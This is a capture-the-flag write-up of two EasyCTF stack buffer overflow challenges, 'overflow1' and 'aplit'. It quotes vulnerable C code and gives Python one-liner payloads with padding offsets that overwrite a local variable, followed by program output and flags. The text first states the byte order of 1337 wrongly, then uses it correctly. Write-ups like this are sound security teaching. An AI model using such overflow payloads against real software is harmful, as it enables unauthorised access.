Problem info:
Can you overflow the stack? Try it at /problems/overflow1 on the EasyCTF shell server. The source is available at /problems/overflow1/overflow1.c, and the program you're trying to overflow is at /problems/overflow1/overflow1. Good luck!
On the sever we see a C file called overflow.c, and it contains the source for the binary. Opening it up the buffer overflow is quite obvious
char buf[20];
int x = 0;
gets(buf);
if (x == 1337) {
So, we need to write up the stack and insert the value of 1337. 1337 in hex is 539 To encode this in little endian byte order we use:
\x05\x39
Now, we use trial and error to see where the buffer overflow
(python -c "print 'A'*25) | ./overflow1
After trial and error we find the number to be 28, and so we send the proper input
(python -c "print 'A'*28 + '\x39\x05'") | ./overflow1
There is the flag
easyctf{i_wish_everything_were_th1s_34sy}
To start this challenge we navigate to /problems/aplit
Here we see a binary, and a C file.
When looking at the C file the relevant code is immediatly noticed:
int main(int argc, char **argv) {
int score = 0;
printf("CollageBored (R) Advanced Placement Literature Grader\n");
if (argc != 2) {
printf("Usage: %s [essay]\n", argv[0]);
return 1;
}
char buf[700];
strcpy(buf, argv[1]);
printf("-------------- YOUR SUBMISSION --------------\n");
printf("%s\n", buf);
printf("---------------------------------------------\n");
printf("According to our analysis, your response received a grade of %d!\n", score);
if (score > 12) {
The program reads user input into a buffer, and then reads a variable. This is a buffer overflow. The approach to this is actually quite simple. We need to see how many characters we need to pass to it to overwrite the score variable. Some trial and error is required, but eventually I found it to be 717.
redacted@shell:/problems/aplit$ ./aplit $(python -c "print 'a'*717")
And there is our flag:
CollageBored (R) Advanced Placement Literature Grader
-------------- YOUR SUBMISSION --------------
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
---------------------------------------------
According to our analysis, your response received a grade of 1633771873!
Wow, you're an HONOR student! Here's a flag: CollageBored (R) Advanced Placement Literature Grader
-------------- YOUR SUBMISSION --------------
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
---------------------------------------------
According to our analysis, your response received a grade of 1633771873!
Wow, you're an HONOR student! Here's a flag: easyctf{essays_are_too_hard}
ez
flag easyctf{essays_are_too_hard}